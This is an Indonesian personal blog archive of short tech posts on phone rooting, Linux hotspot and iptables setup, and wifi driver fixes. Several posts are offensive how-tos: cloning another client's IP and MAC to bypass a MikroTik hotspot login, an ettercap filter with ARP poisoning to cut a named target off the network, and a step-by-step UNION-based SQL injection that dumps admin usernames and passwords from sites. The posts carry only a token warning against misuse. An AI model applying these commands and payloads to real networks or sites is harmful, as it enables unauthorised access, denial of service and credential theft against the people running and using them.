07
May
12

ClockworkMod ROM Manager for galaxy ace gt-s5830i

langah-langkahnya

1. download file ClockWorkRec5830i disini

2. copy ke sdcard

3. masuk ke menu dengan menekan tombol Volume up + Tombol Power + Tombol Home

5. Kemudian Pilih Aplly update Sdcard Kemudian Pilih File ClockWorkRec5830i.zip tunggu sampai selesai

6. jangan delete file ClockWorkRec5830i.zip karena setiap kali mau dipake harus di install dulu

sekian

thanks for http://forum.xda-developers.com/

22
Apr
12

rooting Galaxy Ace Gingerbread (2.3.6)

1. Download File AceGingerRoot Disini

2. Copy Masuk ke sdcard

3. Matikan Hp Kamu

4. Untuk Galaxy ace GT-s5830i tekan tombol Volume up + Tombol Power + Tombol Home

5. Kemudian Pilih Aplly update Sdcard Kemudian Pilih File AceGingerRoot.zip tunggu sampai selesai

6. Reboot Hp Kamu

Sekian

Thanks For
http://rootzwiki.com/

31
Mar
12

Membangun Hotspot + DHCP Server

Assalamu Alaikum Wr.Wb
Ditutorial kali ini saya akan mencoba membangun sebuah hotspot sendiri di Linux dengan Mesin Slackwareku dikarenakan kebutuhan akan jaringan Wireless semakin meningkat. Hotspot yang saya bangun ini sangatlah simple karena tidak menggunakan user database.
Untuk aplikasi Hotspotnya saya menggunakan Hostapd (dapat dicari di slackbuild.org) dan DHCPD untuk DHCP Servernya
Ok langsung saja, siapkan alat dan bahan 😀
1. Kopi Cappucino + Sampoerna. 😀 hahahahaha
2. Silahkan Download dulu aplikasi Hostapd di disini, kemudian installnya aplikasinya

root@th3w1tch#installpkg hostapd-0610-i486-1_SBo.tgz

3. Konfigurasi Hostapd
Edit file /etc/hostapd/hostapd.conf, saya menggunakan konfigurasi sebagai berikut, sesuaikan keinginan anda :

interface=wlan0
driver=nl80211
ssid=coconut
country_code=ID
hw_mode=g
channel=1
auth_algs=1
ignore_broadcast_ssid=0
wpa=3
wpa_passphrase=coconut123
wpa_pairwise=TKIP
rsn_pairwise=CCMP

4. Konfigurasi DHCP Server
Edit file /etc/dhcpd.conf, saya menggunakan konfigurasi sebagai berikut: sesuaikan DNS dan IP yang anda gunakan.

# dhcpd.conf
#
# Configuration file for ISC dhcpd (see ‘man dhcpd.conf’)
#
option domain-name-servers 8.8.8.8;
default-lease-time 600;
max-lease-time 7200;
ddns-update-style none; ddns-updates off;
subnet 192.168.0.0 netmask 255.255.255.0 {
range 192.168.0.200 192.168.0.229;
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.0.255;
option routers 192.168.0.1;
}

4. Membuat Program Bash, untuk start dan stop Hotspot service.

root@th3w1tch:~#nano /etc/rc.d/rc.hotspot

#!/bin/sh
IPTABLES=/usr/sbin/iptables
IFCONFIG=/sbin/ifconfig
DHCPD=/usr/sbin/dhcpd
HOSTAPD=/usr/sbin/hostapd

intwlan0=wlan0
internet=ppp0
ip=192.168.0.1

case "$1" in
start)
echo "Starting $intwlan0 at ip address $ip"
echo 0 > /proc/sys/net/ipv4/ip_forward
killall hostapd
killall dhcpd
$IPTABLES -t nat -A POSTROUTING -o $internet -j MASQUERADE
$IPTABLES -A FORWARD -i $internet -o $intwlan0 -m state \
–state RELATED,ESTABLISHED -j ACCEPT
$IPTABLES -A FORWARD -i $intwlan0 -o $internet -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward
$IFCONFIG $intwlan0 down
$IFCONFIG $intwlan0 up
$IFCONFIG $intwlan0 $ip
if [ ! -f /var/state/dhcp/dhcpd.leases ]; then
touch /var/state/dhcp/dhcpd.leases
fi
$DHCPD -cf /etc/dhcpd.conf $intwlan0
$HOSTAPD -B -P /var/run/hostapd.pid /etc/hostapd/hostapd.conf
;;
stop)
echo "Stopping $intwlan0"
kill -INT $(cat /var/run/hostapd.pid)
kill -INT $(cat /var/run/dhcpd.pid)
iptables -F
iptables -Z
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -t nat -Z
;;
*)
echo "Usage: $0 {start|stop}"
exit 1
;;
esac

Perhatikan Kode diatas, sesuaikan interface yang terkoneksi internet, saya menngunakan interface ppp0

5. Rubah Permision File yang kita buat, kemudian jalankan

root@th3w1tch:~#chmod +x /etc/rc.d/rc.hotspot

root@th3w1tch:~#/etc/rc.d/rc.hotspot start

6. Silahkan Scan wirelesnya ke komputer Client. dan silahkan berhotspot ria
– Jika ingin Hotspotnya aktif setiap Komputer boot :
edit file /etc/rc.d/rc.local, tambahkan baris ini :

if [ -x /etc/rc.d/rc.hotspot ]; then
/etc/rc.d/rc.hotspot start
fi

– Jika anda ingin membuat sebuah halaman Login hotspot dengan user database, mainkan IPTABLES nya :
Redirect Semua paket melalui port 80 menuju webserver lokal

root@th3w1tch:~#iptables -t nat -A PREROUTING -s 192.168.0.0/24 -p tcp -m tcp –dport 80 -j REDIRECT –to-port 80

Pada webserver diletakkan halaman login untuk user WLAN, setelah user melakukan login, lakukan INSERT pada tabel FORWARD dan PREROUTING. Perintah ini bisa dilakukan oleh eksekusi php dan perl dalam lingkungan shell dari webserver. Misalkan buat shell script seperti berikut untuk membuka ip agar bisa berinternet.

#!/bin/bash
# file buka.sh
iptables -A FORWARD -s $1 -i wlan0 -o ppp0 -d 0.0.0.0/0 -j ACCEPT
iptables -A FORWARD -s 0.0.0.0/0 -i ppp0 -o wlan0 -d $1 -j ACCEPT
iptables -t nat -I PREROUTING -s $1 -p tcp -m tcp –dport 80 -d 0/0 -j RETURN

Sedangkan untuk menutup ip agar tidak bisa berinternet kita buat shell script seperti berikut:

#!/bin/bash
# file tutup.sh
iptables -A FORWARD -s $1 -i wlan0 -o ppp0 -d 0.0.0.0/0 -j ACCEPT
iptables -A FORWARD -s 0.0.0.0/0 -i ppp0 -o wlan0 -d $1 -j ACCEPT
iptables -t nat -D PREROUTING -s $1 -p tcp -m tcp –dport 80 -d 0/0 -j RETURN

Pastikan webserver utama adalah script login untuk pengguna hotspot tersebut.
Contoh penggunaan buka.sh dan tutup.sh, misalkan pada pengguna hotspot diberi IP 192.168.0.202 maka, setelah pengguna melakukan login, otomatis akan mengeksekusi perintah:
/path/buka.sh 192.168.0.202

Setelah selesai dan ingin menutup koneksi dari pengguna gunakan eksekusi tutup.sh
/path/tutup.sh 192.168.0.202

Silahkan Bereksperimen
Sekian dan Terima Kasih, Mudah-mudahan dapar bermanfaat. Mohon Maaf jika ada kesalahan. Silahkan Kritik dan Sarannya :

Referensi http://th3w1tch.wordpress.com/

30
Mar
12

Melewati Akses Mikrotik (Bypass Mikrotik)

Cara ini memang sudah basi di network hacking, tapi gak apa2 niatnya kan cuman share. cz Ilmu itu milik Dunia hahahaha
ok langsung saja saya menggunakan LInux, windows juga bisa
1. Koneksikan Hotspot seperti biasa

root@eXpL01t3r:~#ifconfig wlan0 up

root@eXpL01t3r:~# iwconfig wlan0 essid “HOTSPOTKU”

root@eXpL01t3r:~#iwconfig wlan0 ap 00:11:22:33:44:55

2. cari client(komputer) yang terkoneksi dengan bantuan tuxcut atau wireshark, pilih salah satunya yang sedang terkoneksi. dan catat Ip dan Macadressnya

3. sekarang ganti ip dan macadress kamu dengan ip yang kamu catat tadi
Misalkan Ip dan Maccadres yang kamu catat :
ip : 192.168.30.13
macc :00:17:c4:bd:fe:09
gateway/mikrotik :192.168.30.1

root@eXpL01t3r:~#ifconfig wlan0 down

root@eXpL01t3r:~#macchanger -m 00:17:c4:bd:fe:09 wlan0

root@eXpL01t3r:~#ifconfig wlan0 up

root@eXpL01t3r:~#ifconfig wlan0 192.168.30.13

root@eXpL01t3r:~#route add default gw 192.168.30.1

4. setelah macc dan ip sudah terganti, koneksikan kembali seperti biasa –> ke no.1
Intinya disini cuman mengganti Ip dan Maccadres client yang telah melewati akses mikrotik

Cara ke 2
Untuk cara ke 2 dengan melakukan ssh tunneling, jadi seperti ini, biasanya user & password Mikrotik tiap komputer berbeda-beda, biasanya terjadi di jaringan kampus. anggaplah anda sebagai tamu di kampus, dan duduk di kantin dan ingin berinternet , jika anda meminta user dan pass mikrotik keteman anda, tetapi teman anda juga sedang memakai user dan password mikrotiknya. maka anda tidak dapat melewati akses mikrotiknya.
jadi biasanya saya melakukan cara ssh tunneling ke komputer teman saya
1. Suruh teman anda untuk membuka port 22 SSH nya
2. sekarang tunneling ke komputer teman
contoh : ip teman kamu : 192.168.30.7

root@eXpL01t3r:~#ssh -D 1080 user@192.168.30.7

nah minta password, isikan password teman kamu
3. sekarang tinggal setting di browser, masuk di pengaturan proxy di browser:
Preference > Network > Setting > Manual Proxy Configuration
isikan SOCKS Host : localhost
Port : 1080
4. Silahkan Berinternet ria
Intinya disini sharing internet via ssh tunneling

Maaf kalaw ada kesalahan diperbaiki cz lupa2 ingat hehehehehe. n klw ada yang kurang jelas silahkan komentnya
Thank’s semoga berguna

Referensi th3w1tch.wordpress.com

30
Mar
12

Dos jaringan WIRELESS on ettercap

sy pengen curhat nih tentang pengamalan sy seminggu yg lalu,tepatx di warkop hostpot.
[maklum nga mampu pasang internet makanya main2 di warkop doank
gini nih historynya : setelah beberapa menit ada org jahat pengen nyoba2 kerjain sy…rencana c…. tu org pengen nyadap USER ma PASS sy. mulanya diya putusin jaringan sy dengan software andalannya NETCUT (win) TUXCUT (linux pake .deb).awalnya jaringan sy putus2 tp kok org disamping sy fine2 aja…ahh ternyata ada org mo kerjain sy ….
sy pengen liat ip yg mana serang sy dengan IPTRAF or wireshark 0R tcpdump …yg ada si di slackware sy…
ternyata yg serang sy dengn ip ini nih 192.168.1.234 aq serang balik the…

to the p01nt aja..

1) kita harus mempunyai ettercap
2) masuk pada directory tux buat file text di dalamnya

root *-* vim-n4n0:~$ su

password:

root *-* vim-n4n0:~#cd /usr/local/share/ettercap/

root *-* vim-n4n0:/usr/local/share/ettercap# kwrite

setelah muncul text editor copy script ini :

if (ip.src == ‘192.168.1.11’ || ip.dst == ‘192.168.1.234’) {
drop();
kill();
msg(“matiko Dropped\n”);
}

kemudian save lalu simpan dengan nama dos.eft
Nb: buat 2 file text pada directory diatas dengan nama dos.eft & dos.ef

3) load file tersebut : carany >>>>

root *-* vim-n4n0:/usr/local/share/ettercap#etterfilter dos.eft -o dos.ef

4) lakukan penyerangan pada target :

root *-* vim-n4n0:~# ettercap -i wlan0 -T -q -F /usr/local/share/ettercap/dos.eft -M ARP /192.168.1.234/ //

5) setelah i2 ettercap meload file text yg kita buat
6) apabila ada tertulis [paket Drop] maka target udah lumpuh gitu loh..
7) ini hanya pembelajaran semata jangan di salah gunakan ya…..

Referensi http://xmalakaji.wordpress.com
GOoD LucK …

30
Mar
12

[SOLVED] BT 5 R2 Blank screen after startx

tes tes, alhamdulillah ya, syahroni banget bsa hadir lagi dsini.

ok tanpa basah mami basi, dsini saya mau share sdikit tips untuk mengatasi blank screen waktu menjalankan Back|track 5 R2 (mungkin bsa jg untuk distro yg lain).

kasus ini terjadi saat kita pngen masuk pada GUI mode (startx).

entah knapa diagnosa pertama saya langsung mengarah pada module vga, akhirnya saya coba bermain dan ngamuk di grub loader menu hingga pada suatu waktu ceritanya berakhir mengharukan. (

nah loh, maksudnya kasusnya bisa gw atasi.

ok berikut peta menuju harta karunnya.

saat masuk di grub option, pilih yang default trus tekan e untuk editing (klo livenya make plesdis dari unetbootin, tekan tab).

perhatikan pada baris text splash vga=791 edit menjadi

text i915.modeset=1

trus boot deh, klo live DVD tkan ctrl-x trus klo make FD unetbootin lngsung saja tkan Enter.

ok, anggap saja sdah masuk pada rootshell. (root@root: ~# )

dsni kita perlu file konfigurasi xorg.conf untuk xserver, krna defaultnya gak ada.

lngsung saja jalankan Xorg -configure

trus kita copy filenya yang sdah kita buat tadi. copy ke /etc/X11/

root@root: ~# cp /root/xorg.conf.new /etc/X11/xorg.conf

slanjutnya kita edit dulu,

(untuk kasus saya, mudah2an teman yang lain dah fix). ok, anggap instalasinya sdah finish. slahkan reboot untuk masuk ke backtrack dalam mesin kita. masalah baru pun muncul, KDE akan terasa sangat berat. ini dikarenakan monster naga menghancurkan kota sedangkan ultramen lagi liburan. untung aja ada mr. Piccolo. wokwok. om pasti sdah tau dimana letak masalahnya. buat yang blom tau disini saya mau share dikit lagi. diputerr, dijilat, dibuang

masih ingat soal intel dan vesa tadi kan? skarang kita kembalikan menjadi intel. klo sudah, kita butuh untuk menginstall driver vga nya.

apt-cache search intel | grep xorg

disitu ada muncul 3 yang kita perlu untuk install.

xserver-xorg-video-intel
xserver-xorg-video-intel-dbg
xserver-xorg-video-i740

om install saja satu persatu.

klo sdah selesai dan sukses installnya, silahkan reboot. en eng ing eng welkom tude bektrek. #tested : acer 4738z vga intel sampai disini, sekian dan trima kasih. wassalam and keep galau. \m/
Referensi http://meonkzt.com/>

30
Mar
12

wireless broadcom b4313 (rev 1) for slackware 13.37

download paket bcm43xx-0.fw* and *bcm43xx_hdr-0.fw di download disini, kemudian extrack file tersebut, kalau udah di extrack kan ketemu file data.tar.gz nach extrack lagi file data.tar.gz denga perintah tar -xvf nama file, setelah di extrack akan ada dua folder yaitu lib dan usr, masuk kedalam folder /lib/firmware, nach kamu akan ketemu file bcmc, nach copy file bcmc tersebut ke directory /lib/firmware kemudian restart komputer kamu lalu cek interface wifinya

jika kurang mengerti silakan di koment

happy hacking
hacking is not crime, but hacking is art

03
May
11

Membagi koneksi internet di linux

Tulisan ini khusus buat rekan haerul (The TrojanX), yang baru saja menanyakan bagaimana melakukan sharing koneksi dengan linux.

Skenario :
Koneksi internet via ppp0 dan koneksi lokal dengan eth0. IP address untuk eth0 adalah 192.168.1.1/24 sedangkan IP ppp0 dinamis dari ISP. Kondisi ini sebenarnya tidak mutlak hanya saja sebagai illustrasi, untuk kondisi yang lainnya tinggal menyesuaikan.

Bagi – bagi rejeki:
Sharing koneksi internet di linux sangat mudah, hanya saja dilakukan (biasanya) via teks mode yang merupakan sebuah mimpi buruk bagi pengguna GUI. Hanya dengan 5 baris perintah maka koneksi internet pun bisa dibagi.
Contoh sharing koneksi dengan kasus diatas :

# echo 1 > /proc/sys/net/ipv4/ip_forward
# iptables -F
# iptables -t nat -F
# iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -j MASQUERADE
# iptables -A FORWARD -s 192.168.1.0/24 -j ACCEPT

Dengan kelima baris perintah diatas maka koneksi internet sudah bisa di share.
Kita bahas satu per satu baris perintah diatas.

# echo 1 > /proc/sys/net/ipv4/ip_forward
Mengaktifkan forwarding, perintah ini juga dapat dipangkas dengan meng”chmod +x /etc/rc.d/rc.ip_forward”, dengan kata lain membuatnya executable sehingga akan di aktifkan setiap kali boot. Namun tidak ada salahnya mengaktifkannya lagi untuk jaga – jaga.

# iptables -F
Perintah ini membersihkan rule atau aturan – aturan dari iptables.

# iptables -t nat -F
Perintah ini membersihkan rule atau aturan – aturan dari iptables pada bagian NAT (Network Address Translator).

# iptables -A FORWARD -s 192.168.1.0/24 -j ACCEPT
Mengijinkan akses dari ip 192.168.1.0/24 (opsi -s) melewati (FORWARD) host / komputer.

# iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -j MASQUERADE
Inti dari sharing koneksi, setiap akses dari ip 192.168.1.0/24 (opsi -s) akan dilakukan masquerading. Pada beberapa system ada yang menggunakan SNAT. Sharing koneksi dengan SNAT umumnya digunakan untuk koneksi dengan IP Publik statis, jika menggunakan IP dinamis (dial – up) Masquerading adalah pilihan tepat.

Silahkan melihat – lihat manual dari iptables jika menginginkan setting yang spesifik seperti, sharing koneksi via SNAT, hanya melewatkan 1 pc dengan ip tertentu, atau hanya melewatkan mac address tertentu, dll.

Setelah iptables telah siap kita bisa mengeceknya dengan perintah :
# iptables -nL
dan
#iptables -t nat -nL

Untuk bagian “iptables -nL” hasilnya seperti ini :
# iptables -nL
Chain INPUT (policy ACCEPT)
target prot opt source destination

Chain FORWARD (policy ACCEPT)
target prot opt source destination
ACCEPT all -- 192.168.1.0/24 0.0.0.0/0

Chain OUTPUT (policy ACCEPT)
target prot opt source destination

Sedangkan pada “iptables -t nat -nL” hasilnya seperti ini :
# iptables -t nat -nL
Chain PREROUTING (policy ACCEPT)
target prot opt source destination

Chain POSTROUTING (policy ACCEPT)
target prot opt source destination
MASQUERADE all -- 192.168.1.0/24 0.0.0.0/0

Chain OUTPUT (policy ACCEPT)
target prot opt source destination

Perhatikan bagian yang dicetak tebal.
Setelah iptables menghasilkan output (hampir) seperti diatas, maka selanjutnya adalah mempersiapkan client atau komputer yang akan menggunakan koneksi yang kita share.

Set Ip address dari client
Tentu saja jangan sama dengan ip komputer yang melakukan share.

Set IP Gateway client
IP Gateway adalah IP dari komputer yang melakukan share.

Set DNS Client
Umumnya pengguna Dial -up menggunakan DNS bawaan dari ISP, Silahkan diisikan sesuai dengan DNS Server dari masing – masing ISP, untuk linux setting DNS server pada file /etc/resolv.conf. Berikut contoh resolv.conf :

nameserver 192.168.1.254

Baris ini adalah ip dari DNS Server. Dalam hal ini adalah 192.168.1.254. Untuk menghindari kesalahan silahkan merujuk dari resolv.conf dari komputer gateway (yang melakukan koneksi internet).Sedangkan untuk sistem yang lain silahkan menyesuaikan.

Silahkan akses internet dari client, jika masih tidak bisa silahkan teriak disini.
Kelima baris perintah tersebut bisa di masukkan ke rc.local (atau bikinkan script start-up yang lain) jika pc yang digunakan akan melakukan sharing koneksi setiap kali hidup (boot).

Gutlak Haerul.

03
May
11

Wireless Error : SIOCSIFFLAGS: Unknown error For Slackware 13.1

Assalamu Alaikum wr wb
pengalaman sy nih install SLACKWARE 13.1 di laptop tmn sy..waktu install fine-fine aja…

ok yuk kita ngopi dl..

Sambil ngopi2 tmn sy tuh mo internetan nah ternya ehh ternyata ada pesan error setelah wifinya di up …waw

root@vim-n4n0~# ifconfig -a
ok interfacenya ke baca eth0,lo dan wlan0

setelah sy aktifkan wlan0 ada pesan seperti ini

root@vim-n4n0~# ifconfig wlan0 up

SIOCSIFFLAGS: Unknown error 132

nah sebelum ngopret kita buatkan script dl the 
root@vim-n4n0~# kwrite
setelah sy buka tampilan TXT masukkan script seperti ini
for i in /sys/class/rfkill/rfkill*/type;

do

type=”`cat $i`”

if [ “$type” = “wlan” ];

then

n=”`echo $i | sed -r ‘s%/type$%%’`”;

echo 1 > ${n}/state;

fi;

done;

setelah scriptnya di copas save As dengan nama wlan lalu letakkan pada directory /usr/local/sbin/
nah klo kita buat script wlan diatas,kita jg harus membuat conf X nya seperti :
root@vim-n4n0~# kwrite
copas script yg ini :
escription “unlock wireless device”

start on starting network

task

exec /usr/local/sbin/wlan

save As dengan nama wlan.conf kemudian letakkan pada directory /usr/local/sbin/ seperti yg di lakukan td

jika kita sudah yakin bahwa yg kita buat td sudah tersimpan maka jalankan

root@vim-n4n0~# wlan
ok script yg kita buat td udah RUN maka reset Networknya
reset network bisa dilakukan jg dengan cata menekan WIFI yg ada di laptop kita…
root@vim-n4n0~# updatedb
tunggu sampai updatenya selesai …ok
setelah selesai coba aktifkan wlan0 nya
root@vim-n4n0~# ifconfig wlan0 up
nah errornya ilang lampu wifinya jg nyalah

referensi http://xmalakaji.wordpress.com/

27
Apr
11

My SQL Injection Step by Step

Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ‘ atau –
comments: /* atau —
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
=step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
contoh:
[site]/berita.php?id=100’ atau
[site]/berita.php?id=-100
ehingga muncul pesan error seperti berikut (masih bnyak lagi):

==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya…
gunakan perintah : order by

contoh:

[site]/berita.php?id=-100+order+by+1– atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)…
misal:

[site]/berita.php?id=-100+order+by+1–
[site]/berita.php?id=-100+order+by+2–
[site]/berita.php?id=-100+order+by+3–
[site]/berita.php?id=-100+order+by+4–

sehingga muncul error atau hilang pesan error…
misal: [site]/berita.php?id=-100+order+by+9–

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8–

===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8–

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8– atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8–

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..

============
=step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables–

seumpama table yang muncul adalah “admin”

===========
=step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name), 6,7,8+from+information_schema.tables+where+table_schema=database()–

=============
= step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name= 0xhexa– >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema ​.columns+where+table_name=0xhexa–

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

http://www.dolcevie.com/js/converter.html

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema ​.columns+where+table_name=0x61646D696E–

============
=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)–

contoh kata yang keluar adalah id,username,password

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,usernam e,password),6,7,8+from+admin–

==============
= step Delapan:=
==============

tahap terakhir mencari halam admin atau login .

Silahkan DI pelajari Kaka 1 .

======================================




April 2024
M T W T F S S
1234567
891011121314
15161718192021
22232425262728
2930